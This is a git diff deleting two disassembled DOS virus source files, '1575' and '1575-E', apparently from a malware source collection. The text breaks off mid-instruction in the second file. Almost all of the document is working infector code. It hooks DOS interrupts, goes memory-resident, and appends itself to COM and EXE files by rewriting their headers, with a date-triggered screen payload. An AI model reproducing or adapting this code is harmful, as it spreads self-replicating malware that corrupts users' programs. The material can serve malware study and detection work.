diff --git a/0-9/1575 (1).ASM b/0-9/1575 (1).ASM deleted file mode 100755 index 7c94fa0..0000000 --- a/0-9/1575 (1).ASM +++ /dev/null @@ -1,947 +0,0 @@ - -PAGE 60,132 - -; -; -; VRES -; -; Created: 4-Jan-92 -; Passes: 5 Analysis Flags on: H -; -; - -data_1e equ 12Bh -data_2e equ 137h -data_3e equ 139h -data_4e equ 13Bh -data_5e equ 27Dh -data_6e equ 5CDh -data_7e equ 724h -data_8e equ 6B0h -data_9e equ 3 -data_10e equ 12h - -seg_a segment - assume cs:seg_a, ds:seg_a - - - org 100h - -vres proc far - -start: - push cs - mov ax,cs -data_11 dw 105h -data_12 dw 5000h -data_13 dw 0B8h -data_14 dw 5001h - db 0CBh, 0 -data_15 dw 0 -data_16 dw 0EB00h - db 4Ah, 90h -data_17 dw 1460h - db 74h, 2, 53h, 0FFh -data_18 dw 0F000h -data_19 dw 3B8h - db 0, 0CDh -data_20 dw 0CD10h -data_21 dw 20h -data_22 dw 20h -data_23 dw 11h -data_24 dw 0FFFFh -data_25 dw 4 -data_26 dw 100h -data_27 dw 674Fh -data_28 dw 100h -data_29 dw 4 -data_30 dw 0 -data_31 dw 0 -data_32 dw 0 -data_33 dw 340h -data_34 db 5 - db 0, 8Ah, 43h, 0B7h, 9Ah, 14h - db 0, 0, 1, 71h, 0Dh, 8Eh - db 0Ch, 56h, 5, 1, 0EAh, 56h - db 74h, 2, 5Ch, 7, 70h, 0 -loc_1: - push ss - add al,al - or bx,[si+7] - jo loc_2 ; Jump if overflow=1 -loc_2: - push es - push ds - mov ax,es - push cs - pop ds - push cs - pop es - mov data_31,ax - mov ax,ss - mov data_26,ax - mov al,2 - out 20h,al ; port 20h, 8259-1 int command - cld ; Clear direction - xor ax,ax ; Zero register - mov ds,ax - xor si,si ; Zero register - mov di,13Ch - mov cx,10h - repne movsb ; Rep while cx>0 Mov [si] to es:[di] - push ds - pop ss - mov bp,8 - xchg bp,sp - call sub_1 ; (01D5) - jmp loc_24 ; (0552) -loc_3: - call sub_12 ; (05EC) - call sub_2 ; (023D) - jz loc_4 ; Jump if zero - mov al,ds:data_7e - push ax - call sub_3 ; (02AE) - pop ax - mov ds:data_7e,al - jmp short loc_5 ; (01B4) - db 90h -loc_4: - call sub_5 ; (041B) - call sub_6 ; (043D) - cmp byte ptr ds:data_7e,0 - jne loc_5 ; Jump if not equal - mov ax,4C00h - int 21h ; DOS Services ah=function 4Ch - ; terminate with al=return code -loc_5: - cmp byte ptr ds:data_7e,43h ; 'C' - jne loc_8 ; Jump if not equal -loc_6: - pop ds - pop es - push cs - pop ds - pop es - push es - mov di,100h - mov si,10Bh - mov cx,0Ch - repne movsb ; Rep while cx>0 Mov [si] to es:[di] - push es - pop ds - mov ax,100h - push ax - xor ax,ax ; Zero register - retf ; Return far - -vres endp - -; -; SUBROUTINE -; - -sub_1 proc near - mov si,6 - lodsw ; String [si] to ax - cmp ax,192h - je loc_6 ; Jump if equal - cmp ax,179h - jne loc_7 ; Jump if not equal - jmp loc_10 ; (028F) -loc_7: - cmp ax,1DCh - je loc_8 ; Jump if equal - retn -loc_8: - pop ds - pop es - mov bx,cs:data_18 - sub bx,cs:data_29 - mov ax,cs - sub ax,bx - mov ss,ax - mov bp,cs:data_30 - xchg bp,sp - mov bx,cs:data_21 - sub bx,cs:data_22 - mov ax,cs - sub ax,bx - push ax - mov ax,cs:data_23 - push ax - retf ; Return far - db 23h, 1Ah - db '<#/--!.$' - db 0Eh, 23h, 2Fh, 2Dh, 0E0h - db 'D:VRES.COM' - db 0, 58h, 45h, 0, 0 - db 24h, 24h, 24h, 24h, 24h - -; External Entry into Subroutine - -sub_2: - mov ax,3D02h - mov dx,219h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jnc loc_9 ; Jump if carry=0 - clc ; Clear carry flag - retn -loc_9: - mov ds:data_1e,ax - mov dx,673h - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov ax,4202h - mov bx,ds:data_1e - mov cx,0FFFFh - mov dx,0FFFEh - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov dx,27Dh - mov ah,3Fh ; '?' - mov bx,ds:data_1e - mov cx,2 - int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - push ds - mov dx,ds:data_3e - mov ax,ds:data_2e - mov ds,ax - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop ds - cmp word ptr ds:data_5e,0A0Ch - clc ; Clear carry flag - retn - db 0CDh, 20h -loc_10: - cmp ax,22Dh - je loc_11 ; Jump if equal - push ds - pop es - push cs - pop ds - mov ax,data_26 - mov ss,ax - xchg bp,sp - mov si,13Ch - mov di,0 - mov cx,10h - cld ; Clear direction - repne movsb ; Rep while cx>0 Mov [si] to es:[di] - jmp loc_3 ; (018C) -sub_1 endp - - -; -; SUBROUTINE -; - -sub_3 proc near -loc_11: - mov al,43h ; 'C' - mov ds:data_7e,al - mov al,8 - out 70h,al ; port 70h, RTC addr/enabl NMI - ; al = 8, month register - in al,71h ; port 71h, RTC clock/RAM data - mov ds:data_4e,al - mov dx,219h - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jnc loc_12 ; Jump if carry=0 - retn -loc_12: - mov ds:data_1e,ax - mov dx,10Bh - mov bx,ds:data_1e - mov cx,0Ch - mov ah,3Fh ; '?' - int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - mov ax,4202h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - push ax - add ax,10h - and ax,0FFF0h - push ax - shr ax,1 ; Shift w/zeros fill - shr ax,1 ; Shift w/zeros fill - shr ax,1 ; Shift w/zeros fill - shr ax,1 ; Shift w/zeros fill - mov di,31Fh - stosw ; Store ax to es:[di] - pop ax - pop bx - sub ax,bx - mov cx,627h - add cx,ax - mov dx,100h - sub dx,ax - mov bx,ds:data_1e - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - mov ax,4200h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov ah,40h ; '@' - mov bx,ds:data_1e - mov cx,0Ch - mov dx,31Bh - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - mov ah,3Eh ; '>' - mov bx,ds:data_1e - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - retn -sub_3 endp - - db 0Eh, 8Ch, 0C8h, 5, 1, 0 - db 50h, 0B8h, 0, 1, 50h, 0CBh - -; -; SUBROUTINE -; - -sub_4 proc near - mov al,45h ; 'E' - mov byte ptr ds:[724h],al - mov al,8 - out 70h,al ; port 70h, RTC addr/enabl NMI - ; al = 8, month register - in al,71h ; port 71h, RTC clock/RAM data - mov data_34,al - mov dx,219h - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jnc loc_13 ; Jump if carry=0 - retn -loc_13: - mov data_26,ax - mov dx,10Bh - mov bx,data_26 - mov cx,18h - mov ah,3Fh ; '?' - int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - mov ax,4202h - mov cx,0 - mov dx,0 - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - push ax - add ax,10h - adc dx,0 - and ax,0FFF0h - mov data_24,dx - mov data_25,ax - mov cx,727h - sub cx,100h - add ax,cx - adc dx,0 - mov cx,200h - div cx ; ax,dx rem=dx:ax/reg - inc ax - mov data_16,ax - mov data_15,dx - mov ax,data_21 - mov data_22,ax - mov ax,data_20 - mov data_23,ax - mov ax,data_18 - mov data_29,ax - mov ax,data_19 - mov data_30,ax - mov dx,data_24 - mov ax,data_25 - mov cx,10h - div cx ; ax,dx rem=dx:ax/reg - sub ax,10h - sub ax,data_17 - mov data_21,ax - mov data_18,ax - mov data_20,100h - mov data_19,100h - mov ax,4200h - xor cx,cx ; Zero register - mov dx,2 - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov dx,10Dh - mov bx,data_26 - mov cx,16h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - mov ax,4202h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov dx,100h - mov ax,data_25 - pop cx - sub ax,cx - sub dx,ax - mov cx,727h - add cx,ax - sub cx,100h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - retn -sub_4 endp - - db 51h, 0B9h, 0, 0, 0B4h, 4Eh - db 0CDh, 21h, 59h, 0C3h - -; -; SUBROUTINE -; - -sub_5 proc near - push es - mov ax,351Ch - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov cs:data_13,bx - mov cs:data_14,es - mov ax,3521h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - push es - pop ax - mov cs:data_12,ax - mov cs:data_11,bx - pop es - retn -sub_5 endp - - -; -; SUBROUTINE -; - -sub_6 proc near - push ax - push es - push ds - xor ax,ax ; Zero register - mov es,ax - mov si,86h - mov ax,es:[si] - mov ds,ax - mov si,725h - cmp word ptr [si],0A0Ch - jne loc_14 ; Jump if not equal - push ds - pop ax - call sub_13 ; (0611) - pop ds - pop es - pop ax - retn -loc_14: - push cs - pop ds - mov ax,data_31 - dec ax - mov es,ax - cmp byte ptr es:[0],5Ah ; 'Z' - je loc_15 ; Jump if equal - jmp short loc_16 ; (04B4) - db 90h -loc_15: - mov ax,es:data_9e - mov cx,737h - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - sub ax,cx - jc loc_16 ; Jump if carry Set - mov es:data_9e,ax - sub es:data_10e,cx - push cs - pop ds - mov ax,es:data_10e - push ax - pop es - mov si,100h - push si - pop di - mov cx,627h - cld ; Clear direction - repne movsb ; Rep while cx>0 Mov [si] to es:[di] - push es - sub ax,ax - mov es,ax - mov si,84h - mov dx,4A8h - mov es:[si],dx - inc si - inc si - pop ax - mov es:[si],ax -loc_16: - pop ds - pop es - pop ax - retn -sub_6 endp - - db 3Ch, 57h, 75h, 3, 0EBh, 1Eh - db 90h, 80h, 0FCh, 1Ah, 75h, 6 - db 0E8h, 17h, 1, 0EBh, 13h, 90h -loc_17: - cmp ah,11h - jne loc_18 ; Jump if not equal - call sub_7 ; (04E1) - iret ; Interrupt return -loc_18: - cmp ah,12h - jne loc_19 ; Jump if not equal - call sub_10 ; (059C) - iret ; Interrupt return -loc_19: - jmp dword ptr cs:data_11 - -; -; SUBROUTINE -; - -sub_7 proc near - mov al,57h ; 'W' - int 21h ; DOS Services ah=function 00h - ; terminate, cs=progm seg prefx - push ax - push cx - push dx - push bx - push bp - push si - push di - push ds - push es - push cs - pop ds - push cs - pop es - mov byte ptr cs:data_35,0 - nop - call sub_8 ; (0514) - jnz loc_20 ; Jump if not zero - call sub_2 ; (023D) - jz loc_20 ; Jump if zero - call sub_15 ; (065A) - dec byte ptr ds:data_6e -loc_20: - pop es - pop ds - pop di - pop si - pop bp - pop bx - pop dx - pop cx - pop ax - retn -sub_7 endp - - -; -; SUBROUTINE -; - -sub_8 proc near - push cs - pop es - push cs - pop es - cld ; Clear direction - call sub_9 ; (0552) - jnc loc_21 ; Jump if carry=0 - cmp di,0 - retn -loc_21: - mov di,219h - mov al,2Eh ; '.' - mov cx,0Bh - repne scasb ; Rept zf=0+cx>0 Scan es:[di] for al - cmp word ptr [di],4F43h - jne loc_22 ; Jump if not equal - cmp byte ptr [di+2],4Dh ; 'M' - jne loc_22 ; Jump if not equal - mov byte ptr ds:[724h],43h ; 'C' - nop - retn -loc_22: - cmp word ptr [di],5845h - jne loc_ret_23 ; Jump if not equal - cmp byte ptr [di+2],45h ; 'E' - jne loc_ret_23 ; Jump if not equal - mov byte ptr ds:[724h],45h ; 'E' - nop - -loc_ret_23: - retn -sub_8 endp - - -; -; SUBROUTINE -; - -sub_9 proc near -loc_24: - push ds - mov si,cs:data_27 - mov ax,cs:data_28 - mov ds,ax - mov di,219h - lodsb ; String [si] to al - cmp al,0FFh - jne loc_25 ; Jump if not equal - add si,6 - lodsb ; String [si] to al - jmp short loc_26 ; (0574) - db 90h -loc_25: - cmp al,5 - jb loc_26 ; Jump if below - pop ds - stc ; Set carry flag - retn -loc_26: - mov cx,0Bh - cmp al,0 - je locloop_27 ; Jump if equal - add al,40h ; '@' - stosb ; Store al to es:[di] - mov al,3Ah ; ':' - stosb ; Store al to es:[di] - -locloop_27: - lodsb ; String [si] to al - cmp al,20h ; ' ' - je loc_28 ; Jump if equal - stosb ; Store al to es:[di] - jmp short loc_29 ; (0594) - db 90h -loc_28: - cmp byte ptr es:[di-1],2Eh ; '.' - je loc_29 ; Jump if equal - mov al,2Eh ; '.' - stosb ; Store al to es:[di] -loc_29: - loop locloop_27 ; Loop if cx > 0 - - mov al,0 - stosb ; Store al to es:[di] - pop ds - clc ; Clear carry flag - retn -sub_9 endp - - -; -; SUBROUTINE -; - -sub_10 proc near - mov al,57h ; 'W' - int 21h ; DOS Services ah=function 00h - ; terminate, cs=progm seg prefx - push ax - push cx - push dx - push bx - push bp - push si - push di - push ds - push es - push cs - pop ds - push cs - pop es - cmp byte ptr cs:data_35,0 - je loc_30 ; Jump if equal - jmp short loc_31 ; (05D3) - db 90h -loc_30: - call sub_8 ; (0514) - jnz loc_31 ; Jump if not zero - call sub_2 ; (023D) - jz loc_31 ; Jump if zero - call sub_15 ; (065A) - dec byte ptr ds:data_6e - pop es - pop ds - pop di - pop si -data_35 db 5Dh - db 5Bh, 5Ah, 59h, 58h, 0C3h -loc_31: - pop es - pop ds - pop di - pop si - pop bp - pop bx - pop dx - pop cx - pop ax - retn -sub_10 endp - - db 0 - -; -; SUBROUTINE -; - -sub_11 proc near - push ax - push ds - pop ax - mov cs:data_28,ax - mov cs:data_27,dx - pop ax - retn -sub_11 endp - - -; -; SUBROUTINE -; - -sub_12 proc near - push cs - mov al,0 - out 20h,al ; port 20h, 8259-1 int command - mov ax,3524h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov ds:data_3e,bx - mov bx,es - mov ds:data_2e,bx - pop es - mov si,20Ah - mov di,219h - mov cx,0Fh - -locloop_32: - lodsb ; String [si] to al - add al,20h ; ' ' - stosb ; Store al to es:[di] - loop locloop_32 ; Loop if cx > 0 - - retn -sub_12 endp - - -; -; SUBROUTINE -; - -sub_13 proc near - push ax - push cs - pop ds - push cs - pop es - mov bl,data_34 - cmp bl,0Ch - ja loc_34 ; Jump if above - cmp bl,0 - je loc_34 ; Jump if equal - mov al,8 - out 70h,al ; port 70h, RTC addr/enabl NMI - ; al = 8, month register - in al,71h ; port 71h, RTC clock/RAM data - cmp al,0Ch - ja loc_34 ; Jump if above - cmp al,0 - je loc_34 ; Jump if equal - cmp al,bl - je loc_34 ; Jump if equal - inc bl - call sub_14 ; (064F) - cmp al,bl - je loc_34 ; Jump if equal - inc bl - call sub_14 ; (064F) - cmp al,bl - je loc_34 ; Jump if equal - pop ds - call sub_16 ; (0686) - push cs - pop ds - retn - -; External Entry into Subroutine - -sub_14: - cmp bl,0Ch - jbe loc_ret_33 ; Jump if below or = - sub bl,0Ch - -loc_ret_33: - retn -loc_34: - pop ax - retn -sub_13 endp - - -; -; SUBROUTINE -; - -sub_15 proc near - mov dx,673h - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - cmp byte ptr ds:[724h],43h ; 'C' - jne loc_35 ; Jump if not equal - call sub_3 ; (02AE) - jmp short loc_36 ; (0672) - db 90h -loc_35: - call sub_4 ; (0337) -loc_36: - push ds -sub_15 endp - - -; -; -; External Entry Point -; -; - -int_24h_entry proc far - mov dx,data_33 - mov ax,data_32 - mov ds,ax - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop ds - retn -int_24h_entry endp - - db 0B0h, 3, 0CFh - -; -; SUBROUTINE -; - -sub_16 proc near - mov dx,6B0h - mov ax,251Ch - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov byte ptr ds:data_8e,90h - nop - mov ax,0B800h - mov es,ax -data_36 db 0BFh -data_37 dw 0FA0h - db 0B8h, 20h, 7, 0B9h, 0Bh, 0 - db 0F2h, 0ABh, 0Eh, 7, 0C3h, 0 - db 0, 0, 20h, 7, 0Fh - db 0Ah -data_38 db 0Fh - db 0Ah -data_39 db 0Fh - db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh - db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0F7h - db 0Eh, 0EEh, 0Ch, 90h, 0FBh, 50h - db 51h, 52h, 53h, 55h, 56h, 57h - db 1Eh, 6, 0Eh, 1Fh, 0EBh, 0Bh - db 90h -loc_37: - pop es - pop ds - pop di - pop si - pop bp - pop bx - pop dx - pop cx - pop ax - iret ; Interrupt return -sub_16 endp - - db 0B8h, 0, 0B8h, 8Eh, 0C0h, 0E8h - db 2Bh, 0, 0BEh, 9Ah, 6, 0B9h - db 16h, 0, 0F2h, 0A4h, 80h, 3Eh - db 0AEh, 6, 0EEh, 74h, 8, 0C6h - db 6, 0AEh, 6, 0EEh, 0EBh, 6 - db 90h -loc_38: - mov data_38,0F0h -loc_39: - mov ax,es:[di] - mov ah,0Eh - mov data_37,ax - mov data_36,0 - jmp short loc_37 ; (06D0) - -; -; SUBROUTINE -; - -sub_17 proc near - mov di,0 -loc_40: - mov si,69Ch - push di - mov cx,12h - cld ; Clear direction - repe cmpsb ; Rept zf=1+cx>0 Cmp [si] to es:[di] - pop di - jz loc_41 ; Jump if zero - inc di - inc di - cmp di,0FA0h - jne loc_40 ; Jump if not equal - mov di,0 -loc_41: - cmp di,0F9Eh - jne loc_ret_42 ; Jump if not equal - mov data_39,0CFh - -loc_ret_42: - retn -sub_17 endp - - db 43h, 0Ch, 0Ah - -seg_a ends - - - - end start diff --git a/0-9/1575-E (2).ASM b/0-9/1575-E (2).ASM deleted file mode 100755 index 76d3a1f..0000000 --- a/0-9/1575-E (2).ASM +++ /dev/null @@ -1,983 +0,0 @@ - -PAGE 59,132 - -; -; -; 1575-E -; -; Created: 23-May-92 -; Passes: 5 Analysis Options on: none -; -; - -data_1e equ 6 -data_2e equ 84h -data_3e equ 86h -data_4e equ 100h -data_10e equ 31Fh -data_12e equ 0 ;* -data_13e equ 3 ;* -data_14e equ 12h ;* -data_15e equ 0 -data_55e equ 0FA0h -data_56e equ 6B0h -data_57e equ 725h - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -1575-e proc far - -start: - jmp short loc_4 - db 90h -data_17 dw 0B2Bh, 103Eh -data_19 dw 0FF53h -data_20 dw 0F000h -data_21 db 0B4h - db 2 -data_22 dw 2AB2h -data_23 dw 21CDh - db 0CDh, 20h -data_24 dw 0E5h - db 3Dh, 02h,0FFh,0FFh -data_25 dw 50Fh -data_26 dw 100h - db 26h,0D9h -data_27 dw 100h -data_28 dw 50Fh -data_29 dw 480h -data_30 dw 0 -data_31 dw 0 -data_32 dw 53F0h -data_33 dw 5 -data_34 dw 648Ch -data_35 dw 789Fh -data_36 dw 480h -data_37 dw 0BD1h -data_38 dw 1213h -data_39 dw 0EA2h -data_40 dw 5BFh -data_41 db 4Dh -data_42 db 31h - db 68h, 7Dh, 02h,0FBh, 07h - db 70h, 00h - -loc_ret_2: - retn - db 0E2h, 00h - db 0F0h,0FBh, 07h, 70h, 00h -loc_4: - push es - push ds - mov ax,es - push cs - pop ds - push cs - pop es - mov data_38,ax - mov ax,ss - mov data_33,ax - std ; Set direction flag - mov ax,7076h - cld ; Clear direction - xor ax,ax ; Zero register - mov ds,ax - xor si,si ; Zero register - mov di,offset data_42 - mov cx,10h - repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] - push ds - pop ss - mov bp,8 - xchg bp,sp - call sub_2 - jmp loc_27 -loc_5: - call sub_13 - call sub_3 - jz loc_6 ; Jump if zero - mov al,data_53 - push ax - call sub_4 - pop ax - mov data_53,al - jmp short loc_7 - db 90h -loc_6: - call sub_6 - call sub_7 - cmp byte ptr data_53,0 - jne loc_7 ; Jump if not equal - mov ax,4C00h - int 21h ; DOS Services ah=function 4Ch - ; terminate with al=return code -loc_7: - cmp byte ptr data_53,43h ; 'C' - jne loc_10 ; Jump if not equal -loc_8: - pop ds - pop es - push cs - pop ds - pop es - push es - mov di,data_4e - mov si,offset data_21 - mov cx,0Ch - repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] - push es - pop ds - mov ax,100h - push ax - xor ax,ax ; Zero register - retf ; Return far - -1575-e endp - -; -; SUBROUTINE -; - -sub_2 proc near - mov si,data_1e - lodsw ; String [si] to ax - cmp ax,192h - je loc_8 ; Jump if equal - cmp ax,179h - jne loc_9 ; Jump if not equal - jmp loc_12 -loc_9: - cmp ax,1DCh - je loc_10 ; Jump if equal - retn -loc_10: - pop ds - pop es - mov bx,cs:data_25 - sub bx,cs:data_36 - mov ax,cs - sub ax,bx - mov ss,ax - mov bp,cs:data_37 - xchg bp,sp - mov bx,cs:data_28 - sub bx,cs:data_29 - mov ax,cs - sub ax,bx - push ax - mov ax,cs:data_30 - push ax - retf ; Return far -data_43 db 23h - db 1Ah - db '<#/--!.$' - db 0Eh, 23h, 2Fh, 2Dh,0E0h -data_44 db 'A:MIO.COM', 0 - db 58h, 45h, 00h, 00h, 00h - db 24h, 24h, 24h, 24h, 24h - -; External Entry into Subroutine - -sub_3: - mov ax,3D02h - mov dx,offset data_44 ; ('A:MIO.COM') - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jnc loc_11 ; Jump if carry=0 - clc ; Clear carry flag - retn -loc_11: - mov data_33,ax - mov dx,offset int_24h_entry - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov ax,4202h - mov bx,data_33 - mov cx,0FFFFh - mov dx,0FFFEh - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - mov dx,offset data_45 - mov ah,3Fh ; '?' - mov bx,data_33 - mov cx,2 - int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - push ds - mov dx,data_40 - mov ax,data_39 - mov ds,ax - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop ds - cmp data_45,0A0Ch - clc ; Clear carry flag - retn -data_45 dw 20CDh -loc_12: - cmp ax,22Dh - je loc_13 ; Jump if equal - push ds - pop es - push cs - pop ds - mov ax,data_33 - mov ss,ax - xchg bp,sp - mov si,offset data_42 - mov di,data_15e - mov cx,10h - cld ; Clear direction - repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] - jmp loc_5 -sub_2 endp - - -; -; SUBROUTINE -; - -sub_4 proc near -loc_13: - mov al,43h ; 'C' - mov data_53,al - mov al,8 - out 70h,al ; port 70h, RTC addr/enabl NMI - ; al = 8, month register - in al,71h ; port 71h, RTC clock/RAM data - mov data_41,al - mov dx,offset data_44 ; ('A:MIO.COM') - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jnc loc_14 ; Jump if carry=0 - retn -loc_14: - mov data_33,ax - mov dx,offset data_21 - mov bx,data_33 - mov cx,0Ch - mov ah,3Fh ; '?' - int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - mov ax,4202h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - push ax - add ax,10h - and ax,0FFF0h - push ax - shr ax,1 ; Shift w/zeros fill - shr ax,1 ; Shift w/zeros fill - shr ax,1 ; Shift w/zeros fill - shr ax,1 ; Shift w/zeros fill - mov di,data_10e - stosw ; Store ax to es:[di] - pop ax - pop bx - sub ax,bx - mov cx,627h - add cx,ax - mov dx,100h - sub dx,ax - mov bx,data_33 - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - mov ax,4200h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - mov ah,40h ; '@' - mov bx,data_33 - mov cx,0Ch - mov dx,offset data_46 - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - mov ah,3Eh ; '>' - mov bx,data_33 - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - retn -sub_4 endp - -data_46 db 0Eh - db 8Ch,0C8h, 05h, 01h, 00h, 50h - db 0B8h, 00h, 01h, 50h,0CBh - -; -; SUBROUTINE -; - -sub_5 proc near - mov al,45h ; 'E' - mov data_53,al - mov al,8 - out 70h,al ; port 70h, RTC addr/enabl NMI - ; al = 8, month register - in al,71h ; port 71h, RTC clock/RAM data - mov data_41,al - mov dx,offset data_44 ; ('A:MIO.COM') - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jnc loc_15 ; Jump if carry=0 - retn -loc_15: - mov data_33,ax - mov dx,offset data_21 - mov bx,data_33 - mov cx,18h - mov ah,3Fh ; '?' - int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - mov ax,4202h - mov cx,0 - mov dx,0 - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - push ax - add ax,10h - adc dx,0 - and ax,0FFF0h - mov data_31,dx - mov data_32,ax - mov cx,727h - sub cx,100h - add ax,cx - adc dx,0 - mov cx,200h - div cx ; ax,dx rem=dx:ax/reg - inc ax - mov data_23,ax - mov data_22,dx - mov ax,data_28 - mov data_29,ax - mov ax,data_27 - mov data_30,ax - mov ax,data_25 - mov data_36,ax - mov ax,data_26 - mov data_37,ax - mov dx,data_31 - mov ax,data_32 - mov cx,10h - div cx ; ax,dx rem=dx:ax/reg - sub ax,10h - sub ax,data_24 - mov data_28,ax - mov data_25,ax - mov data_27,100h - mov data_26,100h - mov ax,4200h - xor cx,cx ; Zero register - mov dx,2 - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - mov dx,offset data_22 - mov bx,data_33 - mov cx,16h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - mov ax,4202h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - mov dx,100h - mov ax,data_32 - pop cx - sub ax,cx - sub dx,ax - mov cx,727h - add cx,ax - sub cx,100h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - retn -sub_5 endp - - push cx - mov cx,0 - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - pop cx - retn - -; -; SUBROUTINE -; - -sub_6 proc near - push es - mov ax,351Ch - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov cs:data_19,bx - mov cs:data_20,es - mov ax,3521h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - push es - pop ax - mov word ptr cs:data_17+2,ax - mov cs:data_17,bx - pop es - retn -sub_6 endp - - -; -; SUBROUTINE -; - -sub_7 proc near - push ax - push es - push ds - xor ax,ax ; Zero register - mov es,ax - mov si,data_3e - mov ax,es:[si] - mov ds,ax - mov si,data_57e - cmp word ptr [si],0A0Ch - jne loc_16 ; Jump if not equal - push ds - pop ax - call sub_14 - pop ds - pop es - pop ax - retn -loc_16: - push cs - pop ds - mov ax,data_38 - dec ax - mov es,ax - cmp byte ptr es:data_12e,5Ah ; 'Z' - nop ;*ASM fixup - sign extn byte - je loc_17 ; Jump if equal - jmp short loc_18 - db 90h -loc_17: - mov ax,es:data_13e - mov cx,737h - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - sub ax,cx - jc loc_18 ; Jump if carry Set - mov es:data_13e,ax - sub es:data_14e,cx - push cs - pop ds - mov ax,es:data_14e - push ax - pop es - mov si,100h - push si - pop di - mov cx,627h - cld ; Clear direction - repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] - push es - sub ax,ax - mov es,ax - mov si,data_2e - mov dx,4A8h - mov es:[si],dx - inc si - inc si - pop ax - mov es:[si],ax -loc_18: - pop ds - pop es - pop ax - retn -sub_7 endp - - cmp al,57h ; 'W' - jne loc_19 ; Jump if not equal - jmp short loc_22 - db 90h -loc_19: - cmp ah,1Ah - jne loc_20 ; Jump if not equal - call sub_12 - jmp short loc_22 - db 90h -loc_20: - cmp ah,11h - jne 